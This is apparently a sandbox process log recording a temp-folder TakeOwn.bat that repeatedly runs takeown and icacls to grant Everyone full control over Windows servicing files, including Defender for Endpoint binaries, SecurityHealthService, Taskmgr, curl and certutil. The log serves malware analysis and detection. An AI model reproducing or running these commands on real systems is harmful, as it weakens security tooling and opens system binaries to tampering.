icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchProtocolHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_serviceinitiatedhealing-client_31bf3856ad364e35_10.0.22000.194_none_17fbd7504b9de242\f\SIHClient.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_serviceinitiatedhealing-client_31bf3856ad364e35_10.0.22000.194_none_17fbd7504b9de242\f\SIHClient.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_serviceinitiatedhealing-client_31bf3856ad364e35_10.0.22000.194_none_17fbd7504b9de242\f\SIHClient.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.22000.100_none_bac6834bfb16b20d\f\SecurityHealthSystray.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.22000.100_none_bac6834bfb16b20d\f\SecurityHealthSystray.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.22000.100_none_bac6834bfb16b20d\f\SecurityHealthSystray.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\MsSense.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\MsSense.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\MsSense.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseCE.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseCE.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseCE.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseCncProxy.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseCncProxy.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseCncProxy.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseIR.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseIR.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseIR.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseNdr.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseNdr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseNdr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseSampleUploader.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseSampleUploader.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\SenseSampleUploader.exe" /grant "everyone":(f)
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\n\SenseCM.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\n\SenseCM.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\n\SenseCM.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-shield-provider_31bf3856ad364e35_10.0.22000.100_none_a1709384527830fe\f\SecurityHealthHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-shield-provider_31bf3856ad364e35_10.0.22000.100_none_a1709384527830fe\f\SecurityHealthHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-shield-provider_31bf3856ad364e35_10.0.22000.100_none_a1709384527830fe\f\SecurityHealthHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-shield-provider_31bf3856ad364e35_10.0.22000.100_none_a1709384527830fe\f\SecurityHealthService.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-shield-provider_31bf3856ad364e35_10.0.22000.100_none_a1709384527830fe\f\SecurityHealthService.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-shield-provider_31bf3856ad364e35_10.0.22000.100_none_a1709384527830fe\f\SecurityHealthService.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowsdeviceportal-core-server_31bf3856ad364e35_10.0.22000.282_none_0536e7ab81ae6453\f\WebManagement.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowsdeviceportal-core-server_31bf3856ad364e35_10.0.22000.282_none_0536e7ab81ae6453\f\WebManagement.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowsdeviceportal-core-server_31bf3856ad364e35_10.0.22000.282_none_0536e7ab81ae6453\f\WebManagement.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchFilterHost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchFilterHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchFilterHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchIndexer.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchIndexer.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchIndexer.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchProtocolHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchProtocolHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5519d2fa88b436fc\f\SearchProtocolHost.exe" /grant "everyone":(f)
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_bsdtar_31bf3856ad364e35_10.0.22000.434_none_5be11e6025939378\f\tar.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_bsdtar_31bf3856ad364e35_10.0.22000.434_none_5be11e6025939378\f\tar.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_bsdtar_31bf3856ad364e35_10.0.22000.434_none_5be11e6025939378\f\tar.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_curl_31bf3856ad364e35_10.0.22000.434_none_841ec22dd6bd92c4\f\curl.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_curl_31bf3856ad364e35_10.0.22000.434_none_841ec22dd6bd92c4\f\curl.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_curl_31bf3856ad364e35_10.0.22000.434_none_841ec22dd6bd92c4\f\curl.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-a..-experience-apphelp_31bf3856ad364e35_10.0.22000.65_none_6e6aca3ab1161ee5\f\pcaui.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-a..-experience-apphelp_31bf3856ad364e35_10.0.22000.65_none_6e6aca3ab1161ee5\f\pcaui.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-a..-experience-apphelp_31bf3856ad364e35_10.0.22000.65_none_6e6aca3ab1161ee5\f\pcaui.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-a..ence-infrastructure_31bf3856ad364e35_10.0.22000.282_none_da8c01e10676f001\f\sdbinst.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-a..ence-infrastructure_31bf3856ad364e35_10.0.22000.282_none_da8c01e10676f001\f\sdbinst.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-a..ence-infrastructure_31bf3856ad364e35_10.0.22000.282_none_da8c01e10676f001\f\sdbinst.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-a..t-bytecodegenerator_31bf3856ad364e35_10.0.22000.71_none_ccb71d3ee4c7b8a6\f\ByteCodeGenerator.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-a..t-bytecodegenerator_31bf3856ad364e35_10.0.22000.71_none_ccb71d3ee4c7b8a6\f\ByteCodeGenerator.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-a..t-bytecodegenerator_31bf3856ad364e35_10.0.22000.71_none_ccb71d3ee4c7b8a6\f\ByteCodeGenerator.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\LaunchTM.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\LaunchTM.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\LaunchTM.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\Taskmgr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\Taskmgr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\Taskmgr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-appidcore_31bf3856ad364e35_10.0.22000.318_none_349d8ac96fe3d679\f\appidtel.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-appidcore_31bf3856ad364e35_10.0.22000.318_none_349d8ac96fe3d679\f\appidtel.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-appidcore_31bf3856ad364e35_10.0.22000.318_none_349d8ac96fe3d679\f\appidtel.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.22000.348_none_7c4c059b9e36fe85\f\SpatialAudioLicenseSrv.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.22000.348_none_7c4c059b9e36fe85\f\SpatialAudioLicenseSrv.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.22000.348_none_7c4c059b9e36fe85\f\SpatialAudioLicenseSrv.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-audio-volumecontrol_31bf3856ad364e35_10.0.22000.100_none_cbf7ec6fc0f80985\f\SndVol.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-audio-volumecontrol_31bf3856ad364e35_10.0.22000.100_none_cbf7ec6fc0f80985\f\SndVol.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-audio-volumecontrol_31bf3856ad364e35_10.0.22000.100_none_cbf7ec6fc0f80985\f\SndVol.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-b..re-memorydiagnostic_31bf3856ad364e35_10.0.22000.469_none_ddccf236be43e7c9\f\memtest.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-b..re-memorydiagnostic_31bf3856ad364e35_10.0.22000.469_none_ddccf236be43e7c9\f\memtest.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-b..re-memorydiagnostic_31bf3856ad364e35_10.0.22000.469_none_ddccf236be43e7c9\f\memtest.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-certificaterequesttool_31bf3856ad364e35_10.0.22000.434_none_6dc3a5a2d0fafee9\f\certreq.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-certificaterequesttool_31bf3856ad364e35_10.0.22000.434_none_6dc3a5a2d0fafee9\f\certreq.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-certificaterequesttool_31bf3856ad364e35_10.0.22000.434_none_6dc3a5a2d0fafee9\f\certreq.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-certutil_31bf3856ad364e35_10.0.22000.434_none_bb381a0becef4d51\f\certutil.exe"
C:\Windows\SysWOW64\takeown.exe
